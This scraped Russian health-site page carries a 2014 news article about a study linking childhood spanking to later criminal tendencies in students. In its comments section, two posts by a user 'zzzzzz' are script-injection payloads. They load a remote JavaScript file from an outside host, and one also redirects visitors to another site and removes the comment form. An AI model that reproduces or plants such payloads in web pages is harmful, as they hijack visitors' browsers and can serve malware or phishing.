Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Студенты становятся прест...  >>  Студенты становятся преступниками, если их шлепают в детстве
 
Обратная связь
 

Студенты становятся преступниками, если их шлепают в детстве

Размер шрифта
16 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Появился новый мощный довод в пользу того, что физические наказания для детей абсолютно неприемлемы: шлепки по попе могут сделать из вашего ребенка приступника!

Студенты становятся преступниками, если их шлепают в детстве

 Исследование проводилось на базе университета Нью-Хэмпшира (США), научную группу возглавил профессор Мюррей Штраус.
«Наши результаты показывают, что, физически наказывая наших детей, мы не только не решаем воспитательных задач, но и вовсе достигаем противоположного эффекта: толкаем их на скользкий путь дурных поступков», – утверждает Штраус.
Авторы проанализировали криминогенные тенденции в среде студентов (более 11 000 человек) из пятнадцати стран, опираясь на девять параметров из профессиональной криминалистики. В их числе – преступные убеждения, социофобия, эпизоды насилия в отношении членов семьи или партнеров в течение предшествующего года, агрессия в отношении окружающих, воровство и другие.
Пятнадцать вышеупомянутых стран составили Гон Конг, Тайвань, Бельгия, Греция, Италия, Норвегия, Польша, Россия, Шотландия, Словения, Испания, Швейцария, Израиль, Канада и США. Штраус и его коллеги учли потенциальное влияние сторонних факторов, таких как образование родителей, поведенческие проблемы в детстве и применявшиеся способы их коррекции, а также пол, возраст и национальность студента. 

Две трети студентов признались, что родители били их в возрасте до десяти лет, в среднем – один или два раза в неделю. Если студента наказывал только один родитель, чаще это оказывалась мать.
Самое интересное наблюдение касалось тех семей, в которых родители были во всех отношениях любящими и заботливыми, но порой все-таки хлестали своих чад по филейной части и не только. 
«Многие родители и даже специалисты-психологи считают, что физические наказания со стороны любящих родителей не приводят к негативным последствиям», – рассказывает Штраус. «Мы доказали, что это заблуждение. Насильственные наказания предрасполагают к проблемам криминального характера вне зависимости от родительских качеств и уровня культуры мамы и папы».
«Многие люди сочтут наши результаты непостижимыми, поскольку они, безусловно, чаще всего преследуют благие цели, стегая своего ребенка ремнем по попе. А именно – скорректировать поведение своего чада и научить его законопослушности», – говорит Штраус.
Среди прочего, авторы изучили, как меняются статистические исходы в зависимости от того, применяет ли меры физического воздействия отец, мать или оба совместно. Оказалось, что в последнем случае степень выраженности восьми из девяти вышеупомянутых криминальных параметров оказывалась максимальной.

Словом, не надо бить своего ребенка! Ничему хорошему вы с помощью ремня не научите.

Другие секреты материнства раскрываются на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего лишь одно изменение в жизни поможет избежать выкидыша!   Синдром Дауна может быть излечим! Новости из США!   Вакцина, которую должен сделать каждый!   Учителя, которые запугивают детей, снижают баллы на ЕГЭ! Остановите их, пока не поздно!  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Первые шаги вашего малыша
Какой бутылкой кормить ребенка?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.